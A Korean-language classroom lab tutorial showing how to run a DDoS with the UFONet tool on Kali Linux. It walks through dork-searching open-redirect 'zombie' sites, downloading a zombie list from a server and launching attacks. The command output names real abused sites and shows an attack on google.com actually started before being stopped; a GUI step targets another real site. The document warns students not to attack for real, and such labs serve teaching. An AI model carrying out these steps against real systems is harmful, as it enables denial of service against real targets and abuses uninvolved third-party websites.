08.3_ufsnet 사용한 DDoS Attack 시뮬레이션

[실습] ufsnet 사용한 DDoS Attack 시뮬레이션

 

■ 사용 시스템

- KaliLinux

 

■ 사용 프로그램

- ufonet

 

UFONET 동작원리	UFONET GUI 툴

 

 

Description

UFONet is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet.

 

See this links for more info:

 

- CWE-601:Open Redirect:

http://cwe.mitre.org/data/definitions/601.html

 

- OWASP:URL Redirector Abuse:

https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2

 

UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.

 

[Video] -> http://ufonet.03c8.net/ufonet/UFONet-v0.6.ogv

  

 

(KaliLinux)

 

① ufonet 프로그램 다운로드

www.sourceforge.net 접속하여

-> "ufonet" 프로그램 검색

-> 파일이름: ufonet-v0.5b.zip

 ufonet-v0.6.zip

-> 0.5b 버전과 0.6 버전이 GUI Web으로 설정하는 화면이 조금 틀리다.

-> 0.6 버전은 여러가지 기능이 추가되었다.

 

ufonet 프로그램 직접 다운로드 하는 사이트

- https://sourceforge.net/projects/ufonet/?source=directory

 

 

② ufonet 프로그램 압축 해제 및 디렉토리 확인

/test1 디렉토리에 ufonet-v0.6.zip 파일을 다운로드 받은 상태이다.

 

# cd /test1

# unzip ufonet-v0.6.zip

-> 출력내용 생략

 

# ls

ufonet/ ufonet-v0.6.zip

 

# cd ufonet

# ls

README.md ufonet/

 

# cd ufonet

# ls

aliens.txt core/ docs/ dorks.txt server/ ufonet* zombies.txt

 

③ ufonet 사용법 확인

# ./ufonet

===========================================================================   888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88PY888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888   UFONet - DDoS Botnet via Web Abuse - by psy   ===========================================================================

 

  

 

④ google 검색 엔진을 통해 zombie PC를 검색

기본 검색 엔진은 duck 이다.(지정을 하지 않으면 duck 기본값)

지원되는 검색 엔진의 종류는 많다

.Search engines available:

-------------------------

+ duck

+ google

+ bing

+ yahoo

+ yandex

-------------------------

 

지원되는 종류를 --se 옵션 다음에 지정하여 사용하면 된다.

Zomebie PC를 검색할 때 사용하는 Keyword는 많다.(ufonet/ufonet/dorks.txt 파일 참조)

----------------------------------------------

proxy.php?url=

check.cgi?url=

checklink?uri=

validator?uri=

redirect_uri=

redirect=

referer=

pageurl=

returnUrl=

goto=

redir=

openfile=

?uri=

url=

----------------------------------------------

적당한 키워드를 사용한다.

 

# ./ufonet -s 'index.php?url=' --se google

===========================================================================   888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888   UFONet - DDoS Botnet via Web Abuse - by psy   ===========================================================================   Searching for 'zombies' using: google   ======================   +Victim found: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url= ------------ +Victim found: http://daimi.au.dk/CPnets/proxy.php?url= ------------ +Victim found: http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url= ------------ +Victim found: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url= ------------ +Victim found: http://judicial.ronny.tw/proxy.php?url= ------------ +Victim found: http://2ch.io/img.theqoo.net/proxy.php?url= ------------ +Victim found: http://www.eurasiam.com/proxy.php?url= ------------ +Victim found: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url= ------------   ====================== +Possible Zombies: 8 ======================   Wanna check if they are valid zombies? (Y/n) Y Are 'they' alive? :-) (HEAD Check): =================================== Trying: 8 --------------------- Zombie: judicial.ronny.tw Status: Ok [200] ---------- Zombie: reprints.ygsgroup.com Status: Ok [200] ---------- Zombie: www.icap2014.com Status: Ok [200] ---------- Zombie: 2ch.io Status: Ok [200] ---------- Zombie: www.sltrib.com Status: Ok [200] ---------- Zombie: www.eurasiam.com Status: Ok [200] ---------- Zombie: daimi.au.dk Status: Ok [200] ---------- Zombie: business.louisville.edu http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url= Status: Not Allowed [0] ---------- ================== OK: 7 Fail: 1 ================== ====================== Checking for payloads: ====================== Trying: 7 --------------------- Vector: http://2ch.io/img.theqoo.net/proxy.php?url= Status: Not ready... ---------- Vector: http://judicial.ronny.tw/proxy.php?url= Status: Not ready... ---------- Vector: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url= Status: Not ready... ---------- Vector: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url= Status: Waiting your orders... ---------- Vector: http://www.eurasiam.com/proxy.php?url= Status: Waiting your orders... ---------- Vector: http://daimi.au.dk/CPnets/proxy.php?url= Status: Waiting your orders... ---------- Vector: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url= Status: Not ready... ---------- ================== OK: 3 Fail: 4 ================== ================== Army of 'zombies' ================== ------------------ Total Army: 3 ------------------ Wanna update your army (Y/n)Y -------------------------   [Info] - Botnet updated! ;-)

 

⑤ community server(Turina)로 부터 zombies 목록 다운로드

# ./ufonet --download-zombies

===========================================================================   888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888   UFONet - DDoS Botnet via Web Abuse - by psy   ===========================================================================   Downloading list of 'zombies' from server ...   ======================   Trying 'blackhole': 176.28.23.46   Vortex: IS READY! ------------   [Info] - Congratulations!. Total of 'zombies' downloaded: 1716 ------------   Wanna merge ONLY new 'zombies' to your army (Y/n) Y -------------------------   [Info] - Botnet updated! ;-)

 

⑥ ufonet CLI 명령어를 통해 공격 작업을 수행

# ./ufonet -a http://www.google.com

===========================================================================   888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888   UFONet - DDoS Botnet via Web Abuse - by psy   =========================================================================== Attacking: http://www.google.com =======================================================   ===================== Round: 'Is target up?' ===================== [Info] From here: YES --------------------- [Info] From exterior: YES --------------------- [Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N) y <---- (주의) 실습에서는 'y' 선택하면 안된다. 반드시 'n' 선택한다.     ========================================== Starting round: 1 of 1 ========================================== [Info] Attacking from: www.gamengame.com [Info] Attacking from: brangerbriz.net [Info] Attacking from: whitehousesurgery.org [Info] Attacking from: msdn.developer-works.com [Info] Attacking from: www.dog-ryusen.com [Info] Attacking from: www.jerrywho.de [Info] Attacking from: www.webdeveloper.com [Info] Attacking from: www.dietistdenennie.nl [Info] Attacking from: www.xmarks.com [Info] Attacking from: www.sealyham.sk [Info] Attacking from: www.nobelprize.org [Info] Attacking from: www.haberoku.com [Info] Attacking from: www.foiredelibramont.com [Info] Attacking from: my.pdx.edu [Info] Attacking from: engagethepower.org [Info] Attacking from: lovenest.ru [Info] Attacking from: ckthonon.free.fr ..... (중략) ..... [Info] Attacking from: www.metamodpro.com [Info] Attacking from: www.otohaya.com [Info] Attacking from: www.scafco.com [Info] Attacking from: 7ba.ru [Info] Attacking from: business.louisville.edu [Info] Attacking from: evoec.com [Info] Attacking from: www.jotform.com [Info] Attacking from: msdn.developer-works.com [Info] Attacking from: www2.ogs.state.ny.us ..... (중략) ..... <CTRL + Z> [1]+ Stopped ./ufonet -a http://www.google.com

 

-> 공격은 잠깐만 확인해 보고 끊어야 한다.

-> 지속적으로 공격하면 안된다.

 

# kill %1

[1]+ Stopped ./ufonet -a http://www.google.com

 

# jobs

[1]+ Terminated ./ufonet -a http://www.google.com

 

# jobs

#

 

 

⑦ ufonet GUI 툴을 실행하여 공격 작업을 진행

# ./ufonet --gui

<START MOTHERSHIP!> 선택

 

<Wormhole> 부분에 마우스 포인터를 올린다.

 

 

 

 

<Wormhole> 부분에 마우스 포인터를 올리면 다양한 메뉴가 나온다.

 

 

그 중에서 <Botnet> 부분을 선택한다.

 

 

 

<List 'zombies'> 선택하고 화면의 하단 부분으로 스크롤하여 확인한다.

 

 

<Attack> 부분을 선택한다.

 

 

 

 

Set your target: http://www.soldesk.com Set place to attack: /path/big.jpg

 

 

Set your target: http://www.soldesk.com Set place to attack (주의) 절대 START 하면 안된다.

 

 

 

 

 

⑧ Botnet/DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

 

다음 웹사이트에 접속한다.

http://map.norsecorp.com/

 

 

 

[참고 URL]

How to create botnets for DDoS attacks (2015) using Kali linux

- https://www.youtube.com/watch?v=xCqHxz4ufvo

 

Botnet / DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

- https://www.youtube.com/watch?v=quGv7Bf5BiY

- http://map.norsecorp.com/